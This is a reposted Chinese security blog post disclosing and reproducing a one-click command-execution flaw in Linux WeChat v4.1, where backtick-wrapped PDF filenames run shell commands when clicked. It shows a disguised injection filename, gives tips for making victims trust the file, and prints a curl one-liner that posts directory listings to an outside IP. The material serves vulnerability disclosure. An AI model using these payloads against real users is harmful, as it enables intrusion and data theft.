文章总结： 文档披露了Linux版微信v4.1存在一个远程命令执行漏洞，攻击者可通过构造包含反引号命令的PDF文件名，在用户点击文件时于本地执行任意命令。该漏洞利用受限于文件名长度和格式，且目前仅影响Linux版本，但存在被恶意利用的风险。 综合评分： 65 文章分类： 漏洞分析,移动安全,渗透测试

【已复现】最新版微信v4.1出现远程命令执行漏洞：one-click RCE on Linux WeChat

原创

网安武器库 网安武器库

网安武器库

2026年2月11日 22:04 河南

更多干货  点击蓝字 关注我们

注：本文仅供学习，坚决反对一切危害网络安全的行为。造成法律后果自行负责！

往期回顾

·xss_scanner_mix：一款自动化深度XSS漏洞扫描工具

·StegoScan：CTF自动化隐写识别和解密工具

·Metasploit Pro：可视化的metasploit渗透测试工具

·Coda：实现Windows/Linux入侵痕迹抹除

·OSV-Scanner：一款专门于发现开源软件漏洞的扫描器

·LingOps（灵控）：AWD/AWDP 竞赛自动化平台

背景分析

你是否会想过微信尽然也会有RCE（远程命令执行）[该漏洞截止到Linux最新版v4.1仍存在]，尽管不是实时RCE。事情是这样的，前两天有位友友发现了这样的一个one click rce漏洞：

      就是linux版的微信对文件名没有进行严格校验，导致将文件名利用反引号包裹就可以在本地执行命令，但是该友友并没有在深入研究，这里我们就较为深入研究一下，毕竟微信也算是国民级软件。

触发条件

首先在linux用命令行来启动wechat（这也是触发rce的前提，可能win上也有这个bug但是被隔离了，不太清楚。）

     经过多次尝试，发现并不是所有反引号包裹的文件都可以上传成功，这里我们进针对pdf进行尝试：

目前发现：

1. 一般文件名纯3个字母可以，超过3个字母大概率会出现发送中断情况，应该是内部出现bug被阻断发送了。

2.文件名形式为3个字母+数字可以（这里可以考虑往十进制转命令的方向考虑），3个字母+数字+字母不行。

3.中文 + | + 3个字母可以（这里就起到了很好的伪装作用，由于文件名过长，受害人认为是普通文件，更易相信和打开）

复现

我们直接点击ls.pdf文件，发现弹出pdf的同时，在命令行也执行ls：

 点击伪装文件，也可以弹出pdf，并在命令行执行ls：

`正常文件正常文件正常文件正常文件| ls`.pdf

总结

目前由于微信自身的某些阻断，导致并不是所有命令的文件都可以发送，也一定程度上提高了利用难度，类似直接外带数据的命令，一般是会被阻断的，降低了威胁程度。且该漏洞目前仅限linux版本。

curl -X POST IP -d "filelist=$(ls | paste -sd, -)"

    但该rce在后续也存在被恶意利用的可能性，同时其他版本的如win，也可能存在反引号触发但不易发现的漏洞。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：网安武器库 网安武器库 网安武器库《【已复现】最新版微信v4.1出现远程命令执行漏洞：one-click RCE on Linux WeChat》